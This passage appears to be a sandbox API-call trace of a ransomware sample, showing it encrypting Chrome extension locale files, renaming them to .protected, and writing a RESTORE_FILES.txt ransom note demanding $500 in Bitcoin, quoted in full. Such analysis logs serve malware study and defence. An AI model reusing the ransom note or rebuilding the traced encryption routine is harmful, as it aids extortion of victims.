(lpFirst="messages.json", lpSrch=".txt") returned 0x0 [0079.782] lstrlenW (lpString="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Local\\Google\\Chrome\\User 
Data\\Default\\Extensions\\blpcfgokakmgnkcojhhkbfbldkacnbeo\\4.2.8_0\\_locales\\id\\messages.json") returned 157 [0079.782] StrStrW (lpFirst="messages.json", lpSrch=".rar") returned 0x0 [0079.782] lstrlenW (lpString="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Local\\Google\\Chrome\\User Data\\Default\\Extensions\\blpcfgokakmgnkcojhhkbfbldkacnbeo\\4.2.8_0\\_locales\\id\\messages.json") returned 157 [0079.782] StrStrW (lpFirst="messages.json", lpSrch=".zip") returned 0x0 [0079.782] ReadFile (in: hFile=0x168, lpBuffer=0xd11128, nNumberOfBytesToRead=0x2800, lpNumberOfBytesRead=0x295d914, lpOverlapped=0x0 | out: lpBuffer=0xd11128*, lpNumberOfBytesRead=0x295d914*=0xb3, lpOverlapped=0x0) returned 1 [0079.783] SetFilePointerEx (in: hFile=0x168, liDistanceToMove=0xffffff4d, lpNewFilePointer=0xffffffff, dwMoveMethod=0x0 | out: lpNewFilePointer=0xffffffff) returned 1 [0079.783] WriteFile (in: hFile=0x168, lpBuffer=0xd11128*, nNumberOfBytesToWrite=0xb3, lpNumberOfBytesWritten=0x295d914, lpOverlapped=0x0 | out: lpBuffer=0xd11128*, lpNumberOfBytesWritten=0x295d914*=0xb3, lpOverlapped=0x0) returned 1 [0079.783] SetFilePointerEx (in: hFile=0x168, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0x0 | out: lpNewFilePointer=0x0) returned 1 [0079.783] WriteFile (in: hFile=0x168, lpBuffer=0x295d8ec*, nNumberOfBytesToWrite=0x4, lpNumberOfBytesWritten=0x295d914, lpOverlapped=0x0 | out: lpBuffer=0x295d8ec*, lpNumberOfBytesWritten=0x295d914*=0x4, lpOverlapped=0x0) returned 1 [0079.783] WriteFile (in: hFile=0x168, lpBuffer=0x48ea38*, nNumberOfBytesToWrite=0x30, lpNumberOfBytesWritten=0x295d914, lpOverlapped=0x0 | out: lpBuffer=0x48ea38*, lpNumberOfBytesWritten=0x295d914*=0x30, lpOverlapped=0x0) returned 1 [0079.783] CloseHandle (hObject=0x168) returned 1 [0079.783] wnsprintfW (in: pszDest=0xd11128, cchDest=32767, pszFmt="%s%s" | out: pszDest="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Local\\Google\\Chrome\\User 
Data\\Default\\Extensions\\blpcfgokakmgnkcojhhkbfbldkacnbeo\\4.2.8_0\\_locales\\id\\messages.json.protected") returned 167 [0079.783] MoveFileW (lpExistingFileName="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Local\\Google\\Chrome\\User Data\\Default\\Extensions\\blpcfgokakmgnkcojhhkbfbldkacnbeo\\4.2.8_0\\_locales\\id\\messages.json" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\appdata\\local\\google\\chrome\\user data\\default\\extensions\\blpcfgokakmgnkcojhhkbfbldkacnbeo\\4.2.8_0\\_locales\\id\\messages.json"), lpNewFileName="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Local\\Google\\Chrome\\User Data\\Default\\Extensions\\blpcfgokakmgnkcojhhkbfbldkacnbeo\\4.2.8_0\\_locales\\id\\messages.json.protected" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\appdata\\local\\google\\chrome\\user data\\default\\extensions\\blpcfgokakmgnkcojhhkbfbldkacnbeo\\4.2.8_0\\_locales\\id\\messages.json.protected")) returned 1 [0079.784] FindNextFileW (in: hFindFile=0x47bc10, lpFindFileData=0x295d930 | out: lpFindFileData=0x295d930) returned 0 [0079.784] FindClose (in: hFindFile=0x47bc10 | out: hFindFile=0x47bc10) returned 1 [0079.784] wnsprintfW (in: pszDest=0xd010e0, cchDest=32767, pszFmt="%s\\%s" | out: pszDest="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Local\\Google\\Chrome\\User Data\\Default\\Extensions\\blpcfgokakmgnkcojhhkbfbldkacnbeo\\4.2.8_0\\_locales\\id\\RESTORE_FILES.txt") returned 161 [0079.784] CreateFileW (lpFileName="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Local\\Google\\Chrome\\User Data\\Default\\Extensions\\blpcfgokakmgnkcojhhkbfbldkacnbeo\\4.2.8_0\\_locales\\id\\RESTORE_FILES.txt" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\appdata\\local\\google\\chrome\\user data\\default\\extensions\\blpcfgokakmgnkcojhhkbfbldkacnbeo\\4.2.8_0\\_locales\\id\\restore_files.txt"), dwDesiredAccess=0x40000000, dwShareMode=0x1, lpSecurityAttributes=0x0, dwCreationDisposition=0x1, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0x164 [0079.784] 
lstrlenA (lpString="! SYSTEM SECURITY ALERT !\r\n-----------------------------------------------------------------------------\r\nYour SERVER was tried to be attacked by an outsider.\r\nImmediatly change your password, use a minimum of 8 characters in length.\r\n-----------------------------------------------------------------------------\r\n\r\nAll your personal files was encrypted with RSA public key (1024 bit) to SAVE them from a third party persons. \r\nNow they are ENCRYPTED and SAFE!\r\n\r\nTo RESTORE all your files back immediatly, follow this few simple steps:\r\n\r\n1) Our SECURE-SERVER service charge a payment for file decryption and preventing damage of your SERVER by 3th party persons;\r\n2) After your SUCCESSFUL payment, write us an E-MAIL with your unique SERVER-ID and payment ID;\r\n3) Receive an DECRYPTION TOOL from us back to your E-MAIL;\r\n4) Run the tool on your SERVER and safe-decrypt all your files back to NORMAL state.\r\n\r\nWe STRONGLY RECOMMEND you NOT to use any other decryption tool, files will be LOST!\r\n\r\nWe guarantee:\r\n\r\n100% Successful restoring all of your files\r\n100% Satisfaction guarantee\r\n100% Safe and secure service\r\n\r\n------------------------------------------------------------------------------\r\n\r\nOur E-MAIL: secureserver@memeware.net\r\nPayment type: Bitcoin\r\nSum: $500\r\nOur wallet: 1CfMU2eKnajfpnYvLbWR3m7jZRXujtx8Cm\r\nYour SERVER-ID:\r\n") returned 1341 [0079.784] WriteFile (in: hFile=0x164, lpBuffer=0xf01390*, nNumberOfBytesToWrite=0x53d, lpNumberOfBytesWritten=0x295d914, lpOverlapped=0x0 | out: lpBuffer=0xf01390*, lpNumberOfBytesWritten=0x295d914*=0x53d, lpOverlapped=0x0) returned 1 [0079.785] lstrlenA (lpString="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") returned 684 [0079.785] WriteFile (in: hFile=0x164, lpBuffer=0x447448*, nNumberOfBytesToWrite=0x2ac, lpNumberOfBytesWritten=0x295d914, lpOverlapped=0x0 | out: lpBuffer=0x447448*, lpNumberOfBytesWritten=0x295d914*=0x2ac, 
lpOverlapped=0x0) returned 1 [0079.785] lstrlenA (lpString="\r\n------------------------------------------------------------------------------\r\nFor any questions, write us: secureserver@memeware.net\r\nMEMEWARE SECURE-SERVER SYSTEMS (c) 2018") returned 177 [0079.785] WriteFile (in: hFile=0x164, lpBuffer=0xf018d0*, nNumberOfBytesToWrite=0xb1, lpNumberOfBytesWritten=0x295d914, lpOverlapped=0x0 | out: lpBuffer=0xf018d0*, lpNumberOfBytesWritten=0x295d914*=0xb1, lpOverlapped=0x0) returned 1 [0079.785] CloseHandle (hObject=0x164) returned 1 [0079.785] FindNextFileW (in: hFindFile=0x47bbd0, lpFindFileData=0x295dba0 | out: lpFindFileData=0x295dba0) returned 1 [0079.785] lstrcmpiW (lpString1="it", lpString2="Windows") returned -1 [0079.785] lstrcmpiW (lpString1="it", lpString2="Program Files") returned -1 [0079.785] lstrcmpiW (lpString1="it", lpString2="Program Files (x86)") returned -1 [0079.785] lstrcmpiW (lpString1="it", lpString2="$Recycle.bin") returned 1 [0079.785] lstrcmpiW (lpString1="it", lpString2="System Volume Information") returned -1 [0079.785] wnsprintfW (in: pszDest=0xcf1098, cchDest=32767, pszFmt="%s\\%s" | out: pszDest="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Local\\Google\\Chrome\\User Data\\Default\\Extensions\\blpcfgokakmgnkcojhhkbfbldkacnbeo\\4.2.8_0\\_locales\\it") returned 143 [0079.785] lstrcmpW (lpString1="it", lpString2=".") returned 1 [0079.785] lstrcmpW (lpString1="it", lpString2="..") returned 1 [0079.785] wnsprintfW (in: pszDest=0xd010e0, cchDest=32767, pszFmt="%s\\*" | out: pszDest="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Local\\Google\\Chrome\\User Data\\Default\\Extensions\\blpcfgokakmgnkcojhhkbfbldkacnbeo\\4.2.8_0\\_locales\\it\\*") returned 145 [0079.785] FindFirstFileW (in: lpFileName="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Local\\Google\\Chrome\\User Data\\Default\\Extensions\\blpcfgokakmgnkcojhhkbfbldkacnbeo\\4.2.8_0\\_locales\\it\\*", lpFindFileData=0x295d930 | out: lpFindFileData=0x295d930) returned 
0x47bc10 [0079.786] lstrcmpiW (lpString1=".", lpString2="Windows") returned -1 [0079.786] lstrcmpiW (lpString1=".", lpString2="Program Files") returned -1 [0079.786] lstrcmpiW (lpString1=".", lpString2="Program Files (x86)") returned -1 [0079.786] lstrcmpiW (lpString1=".", lpString2="$Recycle.bin") returned 1 [0079.786] lstrcmpiW (lpString1=".", lpString2="System Volume Information") returned -1 [0079.786] wnsprintfW (in: pszDest=0xd010e0, cchDest=32767, pszFmt="%s\\%s" | out: pszDest="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Local\\Google\\Chrome\\User Data\\Default\\Extensions\\blpcfgokakmgnkcojhhkbfbldkacnbeo\\4.2.8_0\\_locales\\it\\.") returned 145 [0079.786] lstrcmpW (lpString1=".", lpString2=".") returned 0 [0079.786] FindNextFileW (in: hFindFile=0x47bc10, lpFindFileData=0x295d930 | out: lpFindFileData=0x295d930) returned 1 [0079.786] lstrcmpiW (lpString1="..", lpString2="Windows") returned -1 [0079.786] lstrcmpiW (lpString1="..", lpString2="Program Files") returned -1 [0079.786] lstrcmpiW (lpString1="..", lpString2="Program Files (x86)") returned -1 [0079.786] lstrcmpiW (lpString1="..", lpString2="$Recycle.bin") returned 1 [0079.786] lstrcmpiW (lpString1="..", lpString2="System Volume Information") returned -1 [0079.786] wnsprintfW (in: pszDest=0xd010e0, cchDest=32767, pszFmt="%s\\%s" | out: pszDest="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Local\\Google\\Chrome\\User Data\\Default\\Extensions\\blpcfgokakmgnkcojhhkbfbldkacnbeo\\4.2.8_0\\_locales\\it\\..") returned 146 [0079.786] lstrcmpW (lpString1="..", lpString2=".") returned 1 [0079.786] lstrcmpW (lpString1="..", lpString2="..") returned 0 [0079.786] FindNextFileW (in: hFindFile=0x47bc10, lpFindFileData=0x295d930 | out: lpFindFileData=0x295d930) returned 1 [0079.786] lstrcmpiW (lpString1="messages.json", lpString2="Windows") returned -1 [0079.786] lstrcmpiW (lpString1="messages.json", lpString2="Program Files") returned -1 [0079.786] lstrcmpiW (lpString1="messages.json", lpString2="Program 
Files (x86)") returned -1 [0079.786] lstrcmpiW (lpString1="messages.json", lpString2="$Recycle.bin") returned 1 [0079.786] lstrcmpiW (lpString1="messages.json", lpString2="System Volume Information") returned -1 [0079.786] wnsprintfW (in: pszDest=0xd010e0, cchDest=32767, pszFmt="%s\\%s" | out: pszDest="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Local\\Google\\Chrome\\User Data\\Default\\Extensions\\blpcfgokakmgnkcojhhkbfbldkacnbeo\\4.2.8_0\\_locales\\it\\messages.json") returned 157 [0079.786] StrStrIW (lpFirst="messages.json", lpSrch=".protected") returned 0x0 [0079.786] lstrcmpW (lpString1="messages.json", lpString2="RESTORE_FILES.txt") returned -1 [0079.786] CryptGenRandom (in: hProv=0x444d38, dwLen=0x20, pbBuffer=0x295d8cc | out: pbBuffer=0x295d8cc) returned 1 [0079.786] CryptEncrypt (in: hKey=0x444cf8, hHash=0x0, Final=1, dwFlags=0x0, pbData=0x48ea38*, pdwDataLen=0x295d8f4*=0x20, dwBufLen=0x30 | out: pbData=0x48ea38*, pdwDataLen=0x295d8f4*=0x30) returned 1 [0079.787] CreateFileW (lpFileName="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Local\\Google\\Chrome\\User Data\\Default\\Extensions\\blpcfgokakmgnkcojhhkbfbldkacnbeo\\4.2.8_0\\_locales\\it\\messages.json" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\appdata\\local\\google\\chrome\\user data\\default\\extensions\\blpcfgokakmgnkcojhhkbfbldkacnbeo\\4.2.8_0\\_locales\\it\\messages.json"), dwDesiredAccess=0xc0000000, dwShareMode=0x1, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0x168 [0079.787] lstrlenW (lpString="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Local\\Google\\Chrome\\User Data\\Default\\Extensions\\blpcfgokakmgnkcojhhkbfbldkacnbeo\\4.2.8_0\\_locales\\it\\messages.json") returned 157 [0079.787] StrStrW (lpFirst="messages.json", lpSrch=".txt") returned 0x0 [0079.787] lstrlenW (lpString="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Local\\Google\\Chrome\\User 
Data\\Default\\Extensions\\blpcfgokakmgnkcojhhkbfbldkacnbeo\\4.2.8_0\\_locales\\it\\messages.json") returned 157 [0079.787] StrStrW (lpFirst="messages.json", lpSrch=".rar") returned 0x0 [0079.787] lstrlenW (lpString="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Local\\Google\\Chrome\\User Data\\Default\\Extensions\\blpcfgokakmgnkcojhhkbfbldkacnbeo\\4.2.8_0\\_locales\\it\\messages.json") returned 157 [0079.787] StrStrW (lpFirst="messages.json", lpSrch=".zip") returned 0x0 [0079.787] ReadFile (in: hFile=0x168, lpBuffer=0xd11128, nNumberOfBytesToRead=0x2800, lpNumberOfBytesRead=0x295d914, lpOverlapped=0x0 | out: lpBuffer=0xd11128*, lpNumberOfBytesRead=0x295d914*=0xb3, lpOverlapped=0x0) returned 1 [0079.788] SetFilePointerEx (in: hFile=0x168, liDistanceToMove=0xffffff4d, lpNewFilePointer=0xffffffff, dwMoveMethod=0x0 | out: lpNewFilePointer=0xffffffff) returned 1 [0079.788] WriteFile (in: hFile=0x168, lpBuffer=0xd11128*, nNumberOfBytesToWrite=0xb3, lpNumberOfBytesWritten=0x295d914, lpOverlapped=0x0 | out: lpBuffer=0xd11128*, lpNumberOfBytesWritten=0x295d914*=0xb3, lpOverlapped=0x0) returned 1 [0079.788] SetFilePointerEx (in: hFile=0x168, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0x0 | out: lpNewFilePointer=0x0) returned 1 [0079.788] WriteFile (in: hFile=0x168, lpBuffer=0x295d8ec*, nNumberOfBytesToWrite=0x4, lpNumberOfBytesWritten=0x295d914, lpOverlapped=0x0 | out: lpBuffer=0x295d8ec*, lpNumberOfBytesWritten=0x295d914*=0x4, lpOverlapped=0x0) returned 1 [0079.788] WriteFile (in: hFile=0x168, lpBuffer=0x48ea38*, nNumberOfBytesToWrite=0x30, lpNumberOfBytesWritten=0x295d914, lpOverlapped=0x0 | out: lpBuffer=0x48ea38*, lpNumberOfBytesWritten=0x295d914*=0x30, lpOverlapped=0x0) returned 1 [0079.788] CloseHandle (hObject=0x168) returned 1 [0079.788] wnsprintfW (in: pszDest=0xd11128, cchDest=32767, pszFmt="%s%s" | out: pszDest="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Local\\Google\\Chrome\\User 
Data\\Default\\Extensions\\blpcfgokakmgnkcojhhkbfbldkacnbeo\\4.2.8_0\\_locales\\it\\messages.json.protected") returned 167 [0079.788] MoveFileW (lpExistingFileName="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Local\\Google\\Chrome\\User Data\\Default\\Extensions\\blpcfgokakmgnkcojhhkbfbldkacnbeo\\4.2.8_0\\_locales\\it\\messages.json" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\appdata\\local\\google\\chrome\\user data\\default\\extensions\\blpcfgokakmgnkcojhhkbfbldkacnbeo\\4.2.8_0\\_locales\\it\\messages.json"), lpNewFileName="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Local\\Google\\Chrome\\User Data\\Default\\Extensions\\blpcfgokakmgnkcojhhkbfbldkacnbeo\\4.2.8_0\\_locales\\it\\messages.json.protected" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\appdata\\local\\google\\chrome\\user data\\default\\extensions\\blpcfgokakmgnkcojhhkbfbldkacnbeo\\4.2.8_0\\_locales\\it\\messages.json.protected")) returned 1 [0079.789] FindNextFileW (in: hFindFile=0x47bc10, lpFindFileData=0x295d930 | out: lpFindFileData=0x295d930) returned 0 [0079.789] FindClose (in: hFindFile=0x47bc10 | out: hFindFile=0x47bc10) returned 1 [0079.789] wnsprintfW (in: pszDest=0xd010e0, cchDest=32767, pszFmt="%s\\%s" | out: pszDest="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Local\\Google\\Chrome\\User Data\\Default\\Extensions\\blpcfgokakmgnkcojhhkbfbldkacnbeo\\4.2.8_0\\_locales\\it\\RESTORE_FILES.txt") returned 161 [0079.789] CreateFileW (lpFileName="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Local\\Google\\Chrome\\User Data\\Default\\Extensions\\blpcfgokakmgnkcojhhkbfbldkacnbeo\\4.2.8_0\\_locales\\it\\RESTORE_FILES.txt" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\appdata\\local\\google\\chrome\\user data\\default\\extensions\\blpcfgokakmgnkcojhhkbfbldkacnbeo\\4.2.8_0\\_locales\\it\\restore_files.txt"), dwDesiredAccess=0x40000000, dwShareMode=0x1, lpSecurityAttributes=0x0, dwCreationDisposition=0x1, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0x164 [0079.789] 
lstrlenA (lpString="! SYSTEM SECURITY ALERT !\r\n-----------------------------------------------------------------------------\r\nYour SERVER was tried to be attacked by an outsider.\r\nImmediatly change your password, use a minimum of 8 characters in length.\r\n-----------------------------------------------------------------------------\r\n\r\nAll your personal files was encrypted with RSA public key (1024 bit) to SAVE them from a third party persons. \r\nNow they are ENCRYPTED and SAFE!\r\n\r\nTo RESTORE all your files back immediatly, follow this few simple steps:\r\n\r\n1) Our SECURE-SERVER service charge a payment for file decryption and preventing damage of your SERVER by 3th party persons;\r\n2) After your SUCCESSFUL payment, write us an E-MAIL with your unique SERVER-ID and payment ID;\r\n3) Receive an DECRYPTION TOOL from us back to your E-MAIL;\r\n4) Run the tool on your SERVER and safe-decrypt all your files back to NORMAL state.\r\n\r\nWe STRONGLY RECOMMEND you NOT to use any other decryption tool, files will be LOST!\r\n\r\nWe guarantee:\r\n\r\n100% Successful restoring all of your files\r\n100% Satisfaction guarantee\r\n100% Safe and secure service\r\n\r\n------------------------------------------------------------------------------\r\n\r\nOur E-MAIL: secureserver@memeware.net\r\nPayment type: Bitcoin\r\nSum: $500\r\nOur wallet: 1CfMU2eKnajfpnYvLbWR3m7jZRXujtx8Cm\r\nYour SERVER-ID:\r\n") returned 1341 [0079.789] WriteFile (in: hFile=0x164, lpBuffer=0xf01390*, nNumberOfBytesToWrite=0x53d, lpNumberOfBytesWritten=0x295d914, lpOverlapped=0x0 | out: lpBuffer=0xf01390*, lpNumberOfBytesWritten=0x295d914*=0x53d, lpOverlapped=0x0) returned 1 [0079.790] lstrlenA (lpString="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") returned 684 [0079.790] WriteFile (in: hFile=0x164, lpBuffer=0x447448*, nNumberOfBytesToWrite=0x2ac, lpNumberOfBytesWritten=0x295d914, lpOverlapped=0x0 | out: lpBuffer=0x447448*, lpNumberOfBytesWritten=0x295d914*=0x2ac, 
lpOverlapped=0x0) returned 1 [0079.790] lstrlenA (lpString="\r\n------------------------------------------------------------------------------\r\nFor any questions, write us: secureserver@memeware.net\r\nMEMEWARE SECURE-SERVER SYSTEMS (c) 2018") returned 177 [0079.790] WriteFile (in: hFile=0x164, lpBuffer=0xf018d0*, nNumberOfBytesToWrite=0xb1, lpNumberOfBytesWritten=0x295d914, lpOverlapped=0x0 | out: lpBuffer=0xf018d0*, lpNumberOfBytesWritten=0x295d914*=0xb1, lpOverlapped=0x0) returned 1 [0079.790] CloseHandle (hObject=0x164) returned 1 [0079.790] FindNextFileW (in: hFindFile=0x47bbd0, lpFindFileData=0x295dba0 | out: lpFindFileData=0x295dba0) returned 1 [0079.790] lstrcmpiW (lpString1="ja", lpString2="Windows") returned -1 [0079.790] lstrcmpiW (lpString1="ja", lpString2="Program Files") returned -1 [0079.790] lstrcmpiW (lpString1="ja", lpString2="Program Files (x86)") returned -1 [0079.790] lstrcmpiW (lpString1="ja", lpString2="$Recycle.bin") returned 1 [0079.790] lstrcmpiW (lpString1="ja", lpString2="System Volume Information") returned -1 [0079.790] wnsprintfW (in: pszDest=0xcf1098, cchDest=32767, pszFmt="%s\\%s" | out: pszDest="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Local\\Google\\Chrome\\User Data\\Default\\Extensions\\blpcfgokakmgnkcojhhkbfbldkacnbeo\\4.2.8_0\\_locales\\ja") returned 143 [0079.790] lstrcmpW (lpString1="ja", lpString2=".") returned 1 [0079.790] lstrcmpW (lpString1="ja", lpString2="..") returned 1 [0079.790] wnsprintfW (in: pszDest=0xd010e0, cchDest=32767, pszFmt="%s\\*" | out: pszDest="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Local\\Google\\Chrome\\User Data\\Default\\Extensions\\blpcfgokakmgnkcojhhkbfbldkacnbeo\\4.2.8_0\\_locales\\ja\\*") returned 145 [0079.790] FindFirstFileW (in: lpFileName="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Local\\Google\\Chrome\\User Data\\Default\\Extensions\\blpcfgokakmgnkcojhhkbfbldkacnbeo\\4.2.8_0\\_locales\\ja\\*", lpFindFileData=0x295d930 | out: lpFindFileData=0x295d930) returned 
0x47bc10 [0079.790] lstrcmpiW (lpString1=".", lpString2="Windows") returned -1 [0079.790] lstrcmpiW (lpString1=".", lpString2="Program Files") returned -1 [0079.790] lstrcmpiW (lpString1=".", lpString2="Program Files (x86)") returned -1 [0079.790] lstrcmpiW (lpString1=".", lpString2="$Recycle.bin") returned 1 [0079.791] lstrcmpiW (lpString1=".", lpString2="System Volume Information") returned -1 [0079.791] wnsprintfW (in: pszDest=0xd010e0, cchDest=32767, pszFmt="%s\\%s" | out: pszDest="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Local\\Google\\Chrome\\User Data\\Default\\Extensions\\blpcfgokakmgnkcojhhkbfbldkacnbeo\\4.2.8_0\\_locales\\ja\\.") returned 145 [0079.791] lstrcmpW (lpString1=".", lpString2=".") returned 0 [0079.791] FindNextFileW (in: hFindFile=0x47bc10, lpFindFileData=0x295d930 | out: lpFindFileData=0x295d930) returned 1 [0079.791] lstrcmpiW (lpString1="..", lpString2="Windows") returned -1 [0079.791] lstrcmpiW (lpString1="..", lpString2="Program Files") returned -1 [0079.791] lstrcmpiW (lpString1="..", lpString2="Program Files (x86)") returned -1 [0079.791] lstrcmpiW (lpString1="..", lpString2="$Recycle.bin") returned 1 [0079.791] lstrcmpiW (lpString1="..", lpString2="System Volume Information") returned -1 [0079.791] wnsprintfW (in: pszDest=0xd010e0, cchDest=32767, pszFmt="%s\\%s" | out: pszDest="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Local\\Google\\Chrome\\User Data\\Default\\Extensions\\blpcfgokakmgnkcojhhkbfbldkacnbeo\\4.2.8_0\\_locales\\ja\\..") returned 146 [0079.791] lstrcmpW (lpString1="..", lpString2=".") returned 1 [0079.791] lstrcmpW (lpString1="..", lpString2="..") returned 0 [0079.791] FindNextFileW (in: hFindFile=0x47bc10, lpFindFileData=0x295d930 | out: lpFindFileData=0x295d930) returned 1 [0079.791] lstrcmpiW (lpString1="messages.json", lpString2="Windows") returned -1 [0079.791] lstrcmpiW (lpString1="messages.json", lpString2="Program Files") returned -1 [0079.791] lstrcmpiW (lpString1="messages.json", lpString2="Program 
Files (x86)") returned -1 [0079.791] lstrcmpiW (lpString1="messages.json", lpString2="$Recycle.bin") returned 1 [0079.791] lstrcmpiW (lpString1="messages.json", lpString2="System Volume Information") returned -1 [0079.791] wnsprintfW (in: pszDest=0xd010e0, cchDest=32767, pszFmt="%s\\%s" | out: pszDest="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Local\\Google\\Chrome\\User Data\\Default\\Extensions\\blpcfgokakmgnkcojhhkbfbldkacnbeo\\4.2.8_0\\_locales\\ja\\messages.json") returned 157 [0079.791] StrStrIW (lpFirst="messages.json", lpSrch=".protected") returned 0x0 [0079.791] lstrcmpW (lpString1="messages.json", lpString2="RESTORE_FILES.txt") returned -1 [0079.791] CryptGenRandom (in: hProv=0x444d38, dwLen=0x20, pbBuffer=0x295d8cc | out: pbBuffer=0x295d8cc) returned 1 [0079.791] CryptEncrypt (in: hKey=0x444cf8, hHash=0x0, Final=1, dwFlags=0x0, pbData=0x48ea38*, pdwDataLen=0x295d8f4*=0x20, dwBufLen=0x30 | out: pbData=0x48ea38*, pdwDataLen=0x295d8f4*=0x30) returned 1 [0079.791] CreateFileW (lpFileName="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Local\\Google\\Chrome\\User Data\\Default\\Extensions\\blpcfgokakmgnkcojhhkbfbldkacnbeo\\4.2.8_0\\_locales\\ja\\messages.json" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\appdata\\local\\google\\chrome\\user data\\default\\extensions\\blpcfgokakmgnkcojhhkbfbldkacnbeo\\4.2.8_0\\_locales\\ja\\messages.json"), dwDesiredAccess=0xc0000000, dwShareMode=0x1, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0x168 [0079.791] lstrlenW (lpString="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Local\\Google\\Chrome\\User Data\\Default\\Extensions\\blpcfgokakmgnkcojhhkbfbldkacnbeo\\4.2.8_0\\_locales\\ja\\messages.json") returned 157 [0079.791] StrStrW (lpFirst="messages.json", lpSrch=".txt") returned 0x0 [0079.791] lstrlenW (lpString="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Local\\Google\\Chrome\\User 
Data\\Default\\Extensions\\blpcfgokakmgnkcojhhkbfbldkacnbeo\\4.2.8_0\\_locales\\ja\\messages.json") returned 157 [0079.791] StrStrW (lpFirst="messages.json", lpSrch=".rar") returned 0x0 [0079.791] lstrlenW (lpString="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Local\\Google\\Chrome\\User Data\\Default\\Extensions\\blpcfgokakmgnkcojhhkbfbldkacnbeo\\4.2.8_0\\_locales\\ja\\messages.json") returned 157 [0079.791] StrStrW (lpFirst="messages.json", lpSrch=".zip") returned 0x0 [0079.791] ReadFile (in: hFile=0x168, lpBuffer=0xd11128, nNumberOfBytesToRead=0x2800, lpNumberOfBytesRead=0x295d914, lpOverlapped=0x0 | out: lpBuffer=0xd11128*, lpNumberOfBytesRead=0x295d914*=0xb3, lpOverlapped=0x0) returned 1 [0079.792] SetFilePointerEx (in: hFile=0x168, liDistanceToMove=0xffffff4d, lpNewFilePointer=0xffffffff, dwMoveMethod=0x0 | out: lpNewFilePointer=0xffffffff) returned 1 [0079.792] WriteFile (in: hFile=0x168, lpBuffer=0xd11128*, nNumberOfBytesToWrite=0xb3, lpNumberOfBytesWritten=0x295d914, lpOverlapped=0x0 | out: lpBuffer=0xd11128*, lpNumberOfBytesWritten=0x295d914*=0xb3, lpOverlapped=0x0) returned 1 [0079.792] SetFilePointerEx (in: hFile=0x168, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0x0 | out: lpNewFilePointer=0x0) returned 1 [0079.792] WriteFile (in: hFile=0x168, lpBuffer=0x295d8ec*, nNumberOfBytesToWrite=0x4, lpNumberOfBytesWritten=0x295d914, lpOverlapped=0x0 | out: lpBuffer=0x295d8ec*, lpNumberOfBytesWritten=0x295d914*=0x4, lpOverlapped=0x0) returned 1 [0079.792] WriteFile (in: hFile=0x168, lpBuffer=0x48ea38*, nNumberOfBytesToWrite=0x30, lpNumberOfBytesWritten=0x295d914, lpOverlapped=0x0 | out: lpBuffer=0x48ea38*, lpNumberOfBytesWritten=0x295d914*=0x30, lpOverlapped=0x0) returned 1 [0079.792] CloseHandle (hObject=0x168) returned 1 [0079.792] wnsprintfW (in: pszDest=0xd11128, cchDest=32767, pszFmt="%s%s" | out: pszDest="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Local\\Google\\Chrome\\User 
